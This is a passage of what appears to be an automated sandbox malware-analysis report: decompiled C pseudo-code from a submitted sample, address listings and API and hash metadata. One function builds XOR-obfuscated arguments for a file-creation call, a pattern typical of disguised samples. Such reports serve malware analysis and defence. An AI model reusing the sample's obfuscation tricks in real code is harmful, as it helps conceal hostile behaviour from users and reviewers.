                                                                                                                                                                                                                                                    					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if((_t242 & 0x00000002) != 0) {
                                                                                                                                                                                                                                                    					_t262 = 0xc0000093;
                                                                                                                                                                                                                                                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if((_t242 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                    					_t262 = 0xc0000091;
                                                                                                                                                                                                                                                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if((_t242 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                    					_t262 = 0xc000008e;
                                                                                                                                                                                                                                                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if((_t242 & 0x00000008) != 0) {
                                                                                                                                                                                                                                                    					_t262 = 0xc0000090;
                                                                                                                                                                                                                                                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t265 = _a8;
                                                                                                                                                                                                                                                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                                                                                                                                                                                                                                                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                                                                                                                                                                                                                                                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                                                                                                                                                                                                                                                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                                                                                                                                                                                                                                                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                                                                                                                                                                                                                                                    				_t259 = E010DD2C8(_a4);
                                                                                                                                                                                                                                                    				if((_t259 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if((_t259 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if((_t259 & 0x00000008) != 0) {
                                                                                                                                                                                                                                                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if((_t259 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if((_t259 & 0x00000020) != 0) {
                                                                                                                                                                                                                                                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t172 =  *_t265 & 0x00000c00;
                                                                                                                                                                                                                                                    				if(_t172 == 0) {
                                                                                                                                                                                                                                                    					 *_a4 =  *_a4 & 0xfffffffc;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					if(_t172 == 0x400) {
                                                                                                                                                                                                                                                    						_t257 = _a4;
                                                                                                                                                                                                                                                    						_t225 =  *_t257 & 0xfffffffd | 1;
                                                                                                                                                                                                                                                    						L26:
                                                                                                                                                                                                                                                    						 *_t257 = _t225;
                                                                                                                                                                                                                                                    						L29:
                                                                                                                                                                                                                                                    						_t175 =  *_t265 & 0x00000300;
                                                                                                                                                                                                                                                    						if(_t175 == 0) {
                                                                                                                                                                                                                                                    							_t250 = _a4;
                                                                                                                                                                                                                                                    							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                                                                                                                                                                                                                                                    							L35:
                                                                                                                                                                                                                                                    							 *_t250 = _t178;
                                                                                                                                                                                                                                                    							L36:
                                                                                                                                                                                                                                                    							_t179 = _a4;
                                                                                                                                                                                                                                                    							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                                                                                                                                                                                                                    							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                                                                                                                                                                                                                    							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                                                                                                                                                                                                                                                    							if(_a28 == 0) {
                                                                                                                                                                                                                                                    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                                                                                                                                                                                                                                                    								 *((long long*)(_a4 + 0x10)) =  *_a20;
                                                                                                                                                                                                                                                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                                                                                                                                                                                                                    								_t254 = _a4;
                                                                                                                                                                                                                                                    								_t240 = _a24;
                                                                                                                                                                                                                                                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                                                                                                                                                                                                                                                    								 *(_a4 + 0x50) =  *_t240;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                                                                                                                                                                                                                                                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                                                                                                                                                                                                                    								_t240 = _a24;
                                                                                                                                                                                                                                                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                                                                                                                                                                                                                                                    								 *(_a4 + 0x50) =  *_t240;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							E010DD22E(_t254);
                                                                                                                                                                                                                                                    							RaiseException(_t262, 0, 1,  &_a4);
                                                                                                                                                                                                                                                    							_t256 = _a4;
                                                                                                                                                                                                                                                    							if((_t256[2] & 0x00000010) != 0) {
                                                                                                                                                                                                                                                    								 *_t265 =  *_t265 & 0xfffffffe;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							if((_t256[2] & 0x00000008) != 0) {
                                                                                                                                                                                                                                                    								 *_t265 =  *_t265 & 0xfffffffb;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							if((_t256[2] & 0x00000004) != 0) {
                                                                                                                                                                                                                                                    								 *_t265 =  *_t265 & 0xfffffff7;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							if((_t256[2] & 0x00000002) != 0) {
                                                                                                                                                                                                                                                    								 *_t265 =  *_t265 & 0xffffffef;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							if((_t256[2] & 0x00000001) != 0) {
                                                                                                                                                                                                                                                    								 *_t265 =  *_t265 & 0xffffffdf;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t195 =  *_t256 & 0x00000003;
                                                                                                                                                                                                                                                    							if(_t195 == 0) {
                                                                                                                                                                                                                                                    								 *_t265 =  *_t265 & 0xfffff3ff;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_t206 = _t195 - 1;
                                                                                                                                                                                                                                                    								if(_t206 == 0) {
                                                                                                                                                                                                                                                    									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                                                                                                                                                                                                                                                    									L55:
                                                                                                                                                                                                                                                    									 *_t265 = _t209;
                                                                                                                                                                                                                                                    									L58:
                                                                                                                                                                                                                                                    									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                                                                                                                                                                                                                                                    									if(_t199 == 0) {
                                                                                                                                                                                                                                                    										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                                                                                                                                                                                                                                                    										L64:
                                                                                                                                                                                                                                                    										 *_t265 = _t202;
                                                                                                                                                                                                                                                    										L65:
                                                                                                                                                                                                                                                    										if(_a28 == 0) {
                                                                                                                                                                                                                                                    											 *_t240 = _t256[0x14];
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    											 *_t240 = _t256[0x14];
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										return _t202;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_t203 = _t199 - 1;
                                                                                                                                                                                                                                                    									if(_t203 == 0) {
                                                                                                                                                                                                                                                    										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                                                                                                                                                                                                                                                    										goto L64;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_t202 = _t203 - 1;
                                                                                                                                                                                                                                                    									if(_t202 == 0) {
                                                                                                                                                                                                                                                    										 *_t265 =  *_t265 & 0xfffff3ff;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									goto L65;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t210 = _t206 - 1;
                                                                                                                                                                                                                                                    								if(_t210 == 0) {
                                                                                                                                                                                                                                                    									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                                                                                                                                                                                                                                                    									goto L55;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								if(_t210 == 1) {
                                                                                                                                                                                                                                                    									 *_t265 =  *_t265 | 0x00000c00;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							goto L58;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						if(_t175 == 0x200) {
                                                                                                                                                                                                                                                    							_t250 = _a4;
                                                                                                                                                                                                                                                    							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                                                                                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						if(_t175 == 0x300) {
                                                                                                                                                                                                                                                    							 *_a4 =  *_a4 & 0xffffffe3;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_t172 == 0x800) {
                                                                                                                                                                                                                                                    						_t257 = _a4;
                                                                                                                                                                                                                                                    						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                                                                                                                                                                                                                                                    						goto L26;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_t172 == 0xc00) {
                                                                                                                                                                                                                                                    						 *_a4 =  *_a4 | 0x00000003;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                                    0x010dce04
                                                                                                                                                                                                                                                    0x010dce0b
                                                                                                                                                                                                                                                    0x010dce10
                                                                                                                                                                                                                                                    0x010dce16
                                                                                                                                                                                                                                                    0x010dce19
                                                                                                                                                                                                                                                    0x010dce1f
                                                                                                                                                                                                                                                    0x010dce24
                                                                                                                                                                                                                                                    0x010dce29
                                                                                                                                                                                                                                                    0x010dce29
                                                                                                                                                                                                                                                    0x010dce2f
                                                                                                                                                                                                                                                    0x010dce34
                                                                                                                                                                                                                                                    0x010dce39
                                                                                                                                                                                                                                                    0x010dce39
                                                                                                                                                                                                                                                    0x010dce40
                                                                                                                                                                                                                                                    0x010dce45
                                                                                                                                                                                                                                                    0x010dce4a
                                                                                                                                                                                                                                                    0x010dce4a
                                                                                                                                                                                                                                                    0x010dce51
                                                                                                                                                                                                                                                    0x010dce56
                                                                                                                                                                                                                                                    0x010dce5b
                                                                                                                                                                                                                                                    0x010dce5b
                                                                                                                                                                                                                                                    0x010dce62
                                                                                                                                                                                                                                                    0x010dce67
                                                                                                                                                                                                                                                    0x010dce6c
                                                                                                                                                                                                                                                    0x010dce6c
                                                                                                                                                                                                                                                    0x010dce74
                                                                                                                                                                                                                                                    0x010dce84
                                                                                                                                                                                                                                                    0x010dce96
                                                                                                                                                                                                                                                    0x010dcea8
                                                                                                                                                                                                                                                    0x010dcebb
                                                                                                                                                                                                                                                    0x010dcecd
                                                                                                                                                                                                                                                    0x010dced5
                                                                                                                                                                                                                                                    0x010dceda
                                                                                                                                                                                                                                                    0x010dcedf
                                                                                                                                                                                                                                                    0x010dcedf
                                                                                                                                                                                                                                                    0x010dcee6
                                                                                                                                                                                                                                                    0x010dceeb
                                                                                                                                                                                                                                                    0x010dceeb
                                                                                                                                                                                                                                                    0x010dcef2
                                                                                                                                                                                                                                                    0x010dcef7
                                                                                                                                                                                                                                                    0x010dcef7
                                                                                                                                                                                                                                                    0x010dcefe
                                                                                                                                                                                                                                                    0x010dcf03
                                                                                                                                                                                                                                                    0x010dcf03
                                                                                                                                                                                                                                                    0x010dcf0a
                                                                                                                                                                                                                                                    0x010dcf0f
                                                                                                                                                                                                                                                    0x010dcf0f
                                                                                                                                                                                                                                                    0x010dcf19
                                                                                                                                                                                                                                                    0x010dcf1b
                                                                                                                                                                                                                                                    0x010dcf55
                                                                                                                                                                                                                                                    0x010dcf1d
                                                                                                                                                                                                                                                    0x010dcf22
                                                                                                                                                                                                                                                    0x010dcf46
                                                                                                                                                                                                                                                    0x010dcf4e
                                                                                                                                                                                                                                                    0x010dcf42
                                                                                                                                                                                                                                                    0x010dcf42
                                                                                                                                                                                                                                                    0x010dcf58
                                                                                                                                                                                                                                                    0x010dcf5f
                                                                                                                                                                                                                                                    0x010dcf61
                                                                                                                                                                                                                                                    0x010dcf83
                                                                                                                                                                                                                                                    0x010dcf8b
                                                                                                                                                                                                                                                    0x010dcf8e
                                                                                                                                                                                                                                                    0x010dcf8e
                                                                                                                                                                                                                                                    0x010dcf90
                                                                                                                                                                                                                                                    0x010dcf90
                                                                                                                                                                                                                                                    0x010dcf9b
                                                                                                                                                                                                                                                    0x010dcfa1
                                                                                                                                                                                                                                                    0x010dcfa6
                                                                                                                                                                                                                                                    0x010dcfad
                                                                                                                                                                                                                                                    0x010dcfe7
                                                                                                                                                                                                                                                    0x010dcff2
                                                                                                                                                                                                                                                    0x010dcff8
                                                                                                                                                                                                                                                    0x010dcffb
                                                                                                                                                                                                                                                    0x010dcffe
                                                                                                                                                                                                                                                    0x010dd00a
                                                                                                                                                                                                                                                    0x010dd012
                                                                                                                                                                                                                                                    0x010dcfaf
                                                                                                                                                                                                                                                    0x010dcfb2
                                                                                                                                                                                                                                                    0x010dcfbe
                                                                                                                                                                                                                                                    0x010dcfc4
                                                                                                                                                                                                                                                    0x010dcfca
                                                                                                                                                                                                                                                    0x010dcfcd
                                                                                                                                                                                                                                                    0x010dcfd6
                                                                                                                                                                                                                                                    0x010dcfd6
                                                                                                                                                                                                                                                    0x010dd015
                                                                                                                                                                                                                                                    0x010dd023
                                                                                                                                                                                                                                                    0x010dd029
                                                                                                                                                                                                                                                    0x010dd030
                                                                                                                                                                                                                                                    0x010dd032
                                                                                                                                                                                                                                                    0x010dd032
                                                                                                                                                                                                                                                    0x010dd039
                                                                                                                                                                                                                                                    0x010dd03b
                                                                                                                                                                                                                                                    0x010dd03b
                                                                                                                                                                                                                                                    0x010dd042
                                                                                                                                                                                                                                                    0x010dd044
                                                                                                                                                                                                                                                    0x010dd044
                                                                                                                                                                                                                                                    0x010dd04b
                                                                                                                                                                                                                                                    0x010dd04d
                                                                                                                                                                                                                                                    0x010dd04d
                                                                                                                                                                                                                                                    0x010dd054
                                                                                                                                                                                                                                                    0x010dd056
                                                                                                                                                                                                                                                    0x010dd056
                                                                                                                                                                                                                                                    0x010dd063
                                                                                                                                                                                                                                                    0x010dd066
                                                                                                                                                                                                                                                    0x010dd09d
                                                                                                                                                                                                                                                    0x010dd068
                                                                                                                                                                                                                                                    0x010dd068
                                                                                                                                                                                                                                                    0x010dd06b
                                                                                                                                                                                                                                                    0x010dd096
                                                                                                                                                                                                                                                    0x010dd08b
                                                                                                                                                                                                                                                    0x010dd08b
                                                                                                                                                                                                                                                    0x010dd09f
                                                                                                                                                                                                                                                    0x010dd0a7
                                                                                                                                                                                                                                                    0x010dd0aa
                                                                                                                                                                                                                                                    0x010dd0c9
                                                                                                                                                                                                                                                    0x010dd0ce
                                                                                                                                                                                                                                                    0x010dd0ce
                                                                                                                                                                                                                                                    0x010dd0d0
                                                                                                                                                                                                                                                    0x010dd0d5
                                                                                                                                                                                                                                                    0x010dd0e1
                                                                                                                                                                                                                                                    0x010dd0d7
                                                                                                                                                                                                                                                    0x010dd0da
                                                                                                                                                                                                                                                    0x010dd0da
                                                                                                                                                                                                                                                    0x010dd0e6
                                                                                                                                                                                                                                                    0x010dd0e6
                                                                                                                                                                                                                                                    0x010dd0ac
                                                                                                                                                                                                                                                    0x010dd0af
                                                                                                                                                                                                                                                    0x010dd0be
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dd0be
                                                                                                                                                                                                                                                    0x010dd0b1
                                                                                                                                                                                                                                                    0x010dd0b4
                                                                                                                                                                                                                                                    0x010dd0b6
                                                                                                                                                                                                                                                    0x010dd0b6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dd0b4
                                                                                                                                                                                                                                                    0x010dd06d
                                                                                                                                                                                                                                                    0x010dd070
                                                                                                                                                                                                                                                    0x010dd086
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dd086
                                                                                                                                                                                                                                                    0x010dd075
                                                                                                                                                                                                                                                    0x010dd077
                                                                                                                                                                                                                                                    0x010dd077
                                                                                                                                                                                                                                                    0x010dd075
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dd066
                                                                                                                                                                                                                                                    0x010dcf68
                                                                                                                                                                                                                                                    0x010dcf76
                                                                                                                                                                                                                                                    0x010dcf7e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dcf7e
                                                                                                                                                                                                                                                    0x010dcf6c
                                                                                                                                                                                                                                                    0x010dcf71
                                                                                                                                                                                                                                                    0x010dcf71
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dcf6c
                                                                                                                                                                                                                                                    0x010dcf29
                                                                                                                                                                                                                                                    0x010dcf37
                                                                                                                                                                                                                                                    0x010dcf3f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dcf3f
                                                                                                                                                                                                                                                    0x010dcf2d
                                                                                                                                                                                                                                                    0x010dcf32
                                                                                                                                                                                                                                                    0x010dcf32
                                                                                                                                                                                                                                                    0x010dcf2d

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,010DCDF1,?,?,00000008,?,?,010DBFA9,00000000), ref: 010DD023
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                                                                                    • Opcode ID: b723a28d4643fe8a92875e8350e42ac7232d090926be1832349171716333a691
                                                                                                                                                                                                                                                    • Instruction ID: d7eaf7f5f3dcade43294674ece5918d6f9d4cf527efca1c76fba3724a529466f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b723a28d4643fe8a92875e8350e42ac7232d090926be1832349171716333a691
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22B107711106089FE755CF2CC58ABA57FE1FB45364F298698E9D9CF2A2C335E982CB40
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010E8570(signed int _a12, intOrPtr _a16, signed int _a20) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                                                    				void* _v60;
                                                                                                                                                                                                                                                    				long _v64;
                                                                                                                                                                                                                                                    				long _v68;
                                                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v72;
                                                                                                                                                                                                                                                    				long _v76;
                                                                                                                                                                                                                                                    				long _v80;
                                                                                                                                                                                                                                                    				CHAR* _v84;
                                                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                                                    				intOrPtr _t175;
                                                                                                                                                                                                                                                    				intOrPtr _t213;
                                                                                                                                                                                                                                                    				intOrPtr _t215;
                                                                                                                                                                                                                                                    				intOrPtr _t216;
                                                                                                                                                                                                                                                    				intOrPtr _t223;
                                                                                                                                                                                                                                                    				signed int _t225;
                                                                                                                                                                                                                                                    				intOrPtr _t251;
                                                                                                                                                                                                                                                    				intOrPtr _t252;
                                                                                                                                                                                                                                                    				intOrPtr _t255;
                                                                                                                                                                                                                                                    				intOrPtr _t258;
                                                                                                                                                                                                                                                    				intOrPtr _t259;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v16 = _a12 ^ 0x00000ed5;
                                                                                                                                                                                                                                                    				_v20 = _a20 - 0x2796;
                                                                                                                                                                                                                                                    				_v8 = _a20 ^ 0x00002796;
                                                                                                                                                                                                                                                    				_v88 = _a12 ^ 0x00002801;
                                                                                                                                                                                                                                                    				_v24 = _a12 - 0x269;
                                                                                                                                                                                                                                                    				_v28 = _a20 ^ 0x000002ad;
                                                                                                                                                                                                                                                    				_v12 = _a20 ^ 0x000001be;
                                                                                                                                                                                                                                                    				_v56 = _a12 - 0x2801;
                                                                                                                                                                                                                                                    				if(_v8 == (_v16 ^ 0x000003d2)) {
                                                                                                                                                                                                                                                    					_t223 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t78 = _t223 + 0x78; // 0x79aca
                                                                                                                                                                                                                                                    					_v84 =  *(_a16 + 0xec) |  *_t78;
                                                                                                                                                                                                                                                    					_v80 =  *((intOrPtr*)(_a16 + 0xd4)) + _v8;
                                                                                                                                                                                                                                                    					_t225 =  *0x116d6a0; // 0x0
                                                                                                                                                                                                                                                    					_v76 = _t225 * _v56 - _v12;
                                                                                                                                                                                                                                                    					_v72 =  *((intOrPtr*)(_a16 + 0x8c)) + 0x2801;
                                                                                                                                                                                                                                                    					_v68 = _v12 +  *((intOrPtr*)(_a16 + 0x8c)) ^ _v12;
                                                                                                                                                                                                                                                    					_v64 =  *(_a16 + 0xe4) ^ 0x00002801;
                                                                                                                                                                                                                                                    					_v60 = (_v28 ^ 0x0000253b) & _v8;
                                                                                                                                                                                                                                                    					CreateFileA(_v84, _v80, _v76, _v72, _v68, _v64, _v60);
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_a16 + 0x78)) = (_v24 + _v20 |  *0x01D1B1B1) +  *((intOrPtr*)(_a16 + 0x78));
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_a16 + 0xbadc81)) =  *((intOrPtr*)(_a16 + 0xbadc81)) - ( *(_a16 + 0xec) ^ _v24);
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v52 = _v8 ^ 0x00002628;
                                                                                                                                                                                                                                                    					_v48 = _a16;
                                                                                                                                                                                                                                                    					_v44 = _v28 ^ 0x000003bc;
                                                                                                                                                                                                                                                    					_v40 = _v20 + 0x2674;
                                                                                                                                                                                                                                                    					_v36 = _v20 + 0x25a0;
                                                                                                                                                                                                                                                    					_v32 = _v8 + 0x2801;
                                                                                                                                                                                                                                                    					_v24 = E010E5EA0(_v52, _v48, _v44, _v40, _v36, _v32);
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_a16 + 0x24)) =  *((intOrPtr*)(_a16 + 0xb4)) +  *((intOrPtr*)(_a16 + 0x24)) + 0x604;
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_a16 + 0xbadc71)) <= 0x16f57) {
                                                                                                                                                                                                                                                    						_t251 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t56 = _t251 + 0x24; // 0x54000
                                                                                                                                                                                                                                                    						_t252 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t252 + 0x24)) = ( *(_a16 + 0xb0) ^  *(_a16 + 0x10)) +  *_t56 + 0x53c42;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t259 =  *0x116d6d0; // 0xfffe3a5b
                                                                                                                                                                                                                                                    						_t175 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t49 = _t175 + 0xe0; // 0xfffe3a5b
                                                                                                                                                                                                                                                    						_t216 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *(_t216 + 0xe0) = _t259 + 0x000221c0 ^  *_t49;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v16 = _v16 - 0x13c;
                                                                                                                                                                                                                                                    					if(_v16 < (_v12 ^ 0x000000cd)) {
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_a16 + 0x3c)) !=  *((intOrPtr*)(_a16 + 0xbadc71))) {
                                                                                                                                                                                                                                                    							_t213 =  *0x116d628; // 0x1
                                                                                                                                                                                                                                                    							_t258 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t69 = _t258 + 0x24; // 0x54000
                                                                                                                                                                                                                                                    							_t215 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t215 + 0x24)) =  *_t69 - _t213 + 0x1725;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t255 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t71 = _t255 + 0xe0; // 0xfffe3a5b
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a16 + 0x24)) =  *((intOrPtr*)(_a16 + 0x24)) -  *_t71 + 0x1bb7d;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v12 + 0x4c;
                                                                                                                                                                                                                                                    			}



































                                                                                                                                                                                                                                                    0x010e857e
                                                                                                                                                                                                                                                    0x010e858a
                                                                                                                                                                                                                                                    0x010e8596
                                                                                                                                                                                                                                                    0x010e85a1
                                                                                                                                                                                                                                                    0x010e85ad
                                                                                                                                                                                                                                                    0x010e85b9
                                                                                                                                                                                                                                                    0x010e85c4
                                                                                                                                                                                                                                                    0x010e85d0
                                                                                                                                                                                                                                                    0x010e85df
                                                                                                                                                                                                                                                    0x010e874a
                                                                                                                                                                                                                                                    0x010e8756
                                                                                                                                                                                                                                                    0x010e8759
                                                                                                                                                                                                                                                    0x010e8771
                                                                                                                                                                                                                                                    0x010e8774
                                                                                                                                                                                                                                                    0x010e8781
                                                                                                                                                                                                                                                    0x010e8793
                                                                                                                                                                                                                                                    0x010e87a5
                                                                                                                                                                                                                                                    0x010e87b7
                                                                                                                                                                                                                                                    0x010e87c5
                                                                                                                                                                                                                                                    0x010e87e4
                                                                                                                                                                                                                                                    0x010e8807
                                                                                                                                                                                                                                                    0x010e8835
                                                                                                                                                                                                                                                    0x010e85e5
                                                                                                                                                                                                                                                    0x010e85ed
                                                                                                                                                                                                                                                    0x010e85f3
                                                                                                                                                                                                                                                    0x010e85ff
                                                                                                                                                                                                                                                    0x010e860a
                                                                                                                                                                                                                                                    0x010e8616
                                                                                                                                                                                                                                                    0x010e8622
                                                                                                                                                                                                                                                    0x010e8645
                                                                                                                                                                                                                                                    0x010e8661
                                                                                                                                                                                                                                                    0x010e8679
                                                                                                                                                                                                                                                    0x010e86b8
                                                                                                                                                                                                                                                    0x010e86be
                                                                                                                                                                                                                                                    0x010e86c8
                                                                                                                                                                                                                                                    0x010e86ce
                                                                                                                                                                                                                                                    0x010e867b
                                                                                                                                                                                                                                                    0x010e867b
                                                                                                                                                                                                                                                    0x010e8687
                                                                                                                                                                                                                                                    0x010e868c
                                                                                                                                                                                                                                                    0x010e8692
                                                                                                                                                                                                                                                    0x010e8698
                                                                                                                                                                                                                                                    0x010e8698
                                                                                                                                                                                                                                                    0x010e86d9
